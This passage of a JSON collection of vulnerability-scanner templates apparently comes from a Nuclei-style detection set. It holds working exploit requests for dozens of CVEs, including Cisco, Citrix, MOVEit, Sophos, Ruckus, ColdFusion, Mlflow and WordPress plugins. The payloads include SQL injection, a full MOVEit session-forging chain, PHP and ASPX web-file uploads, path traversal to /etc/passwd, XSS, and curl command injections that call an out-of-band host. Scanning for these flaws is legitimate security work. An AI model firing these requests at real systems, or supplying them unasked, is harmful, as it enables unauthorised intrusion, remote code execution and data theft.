text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{file}}.php.\"\nContent-Type: image/jpeg\n\n<?php echo md5('CVE-2023-2648');?>\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\n","POST /attachment/{{name}}/{{file}}.php  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["747711c62dffae7dbf726d8241bd07fe"]},{"type":"status","part":"body_2","status":[200]}],"extractors":[{"type":"regex","name":"name","part":"body","group":1,"regex":["([0-9]+)"],"internal":true}]}]},{"id":"CVE-2023-20073","info":{"name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /index.html HTTP/1.1\nHost: {{Hostname}}\n","POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1\nHost: {{Hostname}}\nAuthorization: 1\nContent-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf\n\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"pathparam\"\n\nPortal\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"fileparam\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file.path\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file\"; filename=\"index.html\"\nContent-Type: application/octet-stream\n\n{{index}}\n{{html_comment}}\n\n--------------------------f6f99e26f3a45adf--\n","GET /index.html HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"dsl","name":"index","internal":true,"dsl":["body_1"]}],"matchers":[{"type":"word","part":"body_3","words":["{{html_comment}}"]}]}]},{"id":"CVE-2023-1454","info":{"name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQLException","XPATH syntax error:"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["XPATH syntax error: '([a-z_@%]+)'","XPATH syntax error: '([a-z- @%]+)'","XPATH syntax error: '([a-z@%0-9.]+)'"],"part":"body"}]}]},{"id":"CVE-2023-2822","info":{"name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cas/logout?url=https://oast.pro\"><img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Identity Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30943","info":{"name":"Moodle - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"raw":["GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/<input><img%20src=x%20onerror=alert(document.domain)>.png HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /login/index.php HTTP/2\nHost: {{Hostname}}\n","POST /login/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n","GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(document.domain)>",">archive","File icon"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","part":"header_4","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-37266","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Random JWT Token","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"Authorization":"{{jwt_token}}"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-4174","info":{"name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index?q=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/stores\"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent","{{BaseURL}}/user_info\"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends","{{BaseURL}}/faqs\"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/classifieds\"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>ridxm","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-1835","info":{"name":"Ninja Forms < 3.6.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Ninja Forms\")"],"condition":"and"}]}]},{"id":"CVE-2023-24322","info":{"name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert('document.domain')","File Browser"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23489","info":{"name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(body_1, \"[]\") && contains(body_2, \"Easy Digital Downloads\")"],"condition":"and"}]}]},{"id":"CVE-2023-25157","info":{"name":"GeoServer OGC Filter - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1\nHost: {{Hostname}}\n","GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["SQL SELECT"]},{"type":"word","part":"header_3","words":["text/xml"]}],"extractors":[{"type":"regex","name":"name","group":1,"regex":["<FeatureType><Name>(.*?)<\\/Name><Title>"],"internal":true,"part":"body_1"},{"type":"regex","name":"column","group":1,"regex":["FID,([aA-zZ_]+),"],"internal":true,"part":"body_2"}]}]},{"id":"CVE-2023-1362","info":{"name":"unilogies/bumsys < v2.0.2 - Clickjacking","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","!regex('X-Frame-Options', header)","contains(body, 'BUM</b>Sys</a>')"],"condition":"and"}]}]},{"id":"CVE-2023-33510","info":{"name":"Jeecg P3 Biz Chat - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24488","info":{"name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E","{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<body x='&'onload=\"(alert)('citrix akamai bypass')\">","<script>alert(document.domain)</script>"],"condition":"or"},{"type":"word","part":"body","words":["Content-Type: text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-39361","info":{"name":"Cacti 1.2.24 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=10","status_code == 200","contains_all(body, \"Tree Mode\", \"cacti\")"],"condition":"and"}]}]},{"id":"CVE-2023-24657","info":{"name":"phpIPAM - 1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"Subnet masks\")"],"condition":"and"}]}]},{"id":"CVE-2023-33440","info":{"name":"Faculty Evaluation System v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=save_user HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------1037163726497\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"id\"\n\n1\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"firstname\"\n\nAdministrator\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"lastname\"\n\na\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5('CVE-2023-33440'); ?>\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"cpass\"\n\n\n-----------------------------1037163726497--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","regex(\"^1$\", body_1)","!regex(\"^2$\", body_1)","len(body_1) == 1","contains(body_2, \"Faculty Evaluation\")"],"condition":"and"}]}]},{"id":"CVE-2023-24489","info":{"name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\\..\\..\\..\\cifs&filename={{fileName}}.aspx HTTP/1.1\nHost: {{Hostname}}\n\n<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<script Language=\"c#\" runat=\"server\">\nvoid Page_Load(object sender, EventArgs e)\n{\n    Response.Write(\"{{randstr}}\");\n}\n</script>\n"],"payloads":{"padding":"helpers/payloads/citrix_paddings.txt"},"threads":30,"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["body == \"ERROR: The method or operation is not implemented.\"","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["BaseURL+ \"/cifs/\" + fileName + \".aspx\""]}]}]},{"id":"CVE-2023-2780","info":{"name":"Mlflow <2.3.1 - Local File Inclusion Bypass","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file://./etc\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-33439","info":{"name":"Faculty Evaluation System v1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=login HTTP/1.1\nHost:{{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nemail={{username}}&password={{password}}&login=1\n","GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1\nHost:{{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Fatal error:\")","contains(body, \"XPATH syntax error:\")"],"condition":"and"}]}]},{"id":"CVE-2023-25717","info":{"name":"Ruckus Wireless Admin - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), 'user-agent','curl')","status_code_1 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-32315","info":{"name":"Openfire Administration Console - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache","java","openfire","jivesoftware"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33568","info":{"name":"Dolibarr Unauthenticated Contacts Database Theft","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"database_user\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29923","info":{"name":"PowerJob <=4.3.2 - Unauthenticated Access","severity":"medium"},"requests":[{"raw":["POST /job/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"appId\":1,\"index\":0,\"pageSize\":10}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":true,\"data\":{\"index\":0,\"pageSize\":10,"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1671","info":{"name":"Sophos Web Appliance - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?c=blocked&action=continue HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargs_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-30019","info":{"name":"Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["Invalid source image"]},{"type":"status","status":[422]}]}]},{"id":"CVE-2023-26255","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jira-database-config>"]},{"type":"word","part":"header","words":["$textMime"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37270","info":{"name":"Piwigo 13.7.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: '\">{{7*7}}${2*2}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=user_activity HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Warning: [mysql error","INSERT  INTO","SQL syntax;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0942","info":{"name":"WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc4jp-options&tab=a</script><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\") && contains(body_2, \"woocommerce-for-japan\")"],"condition":"and"}]}]},{"id":"CVE-2023-26360","info":{"name":"Unauthenticated File Read Adobe ColdFusion","severity":"high"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password=","encrypted=true","adobe"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-3479","info":{"name":"Hestiacp <= 1.7.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["debug-panel","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30150","info":{"name":"PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains(tolower(response_1), \"prestashop\")"],"condition":"and"}]}]},{"id":"CVE-2023-35078","info":{"name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/aad/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34362","info":{"name":"MOVEit Transfer - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nCookie: siLockLongTermInstID=0\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyUsername: Guest\nX-siLock-SessVar1: MyPkgAccessCode: 123\nX-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com\nCookie: siLockLongTermInstID=0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: siLockLongTermInstID=0\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nArg06=123\n","@Host: https://checkip.amazonaws.com\nGET / HTTP/1.1\nHost: checkip.amazonaws.com\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyPkgID: 0\nX-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf\nCookie: siLockLongTermInstID=0\nContent-Length: 0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0\nContent-Type: application/x-www-form-urlencoded\n\nCsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40example.com&Arg09=attachment_list\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{sessioncookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_7","words":["{\"access_token\":"]},{"type":"word","part":"header_7","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ips","regex":["\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b"],"internal":true},{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrftoken\" value=\"(\\w+)\">"],"internal":true,"part":"body"},{"type":"regex","name":"access_token","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body"}]}]},{"id":"CVE-2023-2130","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"Supplier Name\")"],"condition":"and"}]}]},{"id":"CVE-2023-2356","info":{"name":"Mlflow <2.3.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\"}\n","POST /api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\", \"source\": \"file://{{Hostname}}/../../../../../../../\"}\n","GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-38205","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-2982","info":{"name":"Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"set_cookie","words":["wordpress_sec_","wordpress_logged_in_"],"condition":"or"},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-0099","info":{"name":"Simple URLs < 115 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body, \"</script><svg/onload=alert(document.domain)>\")","contains(body_2, \"search_term\")"],"condition":"and"}]}]},{"id":"CVE-2023-0630","info":{"name":"Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"audioShortcodeLibrary\")"],"condition":"and"}]}]},{"id":"CVE-2023-23488","info":{"name":"WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nGET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=5","status_code_1 != 403","contains(body_2, \"pmpro_updates\")"],"condition":"and"}]}]},{"id":"CVE-2023-32117","info":{"name":"Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/igd/v1/get-users-data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"name\":","\"email\":","\"role\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000137","info":{"name":"WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3088","info":{"name":"Apache ActiveMQ Fileserver - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["PUT /fileserver/{{randstr}}.txt HTTP/1.1\nHost: 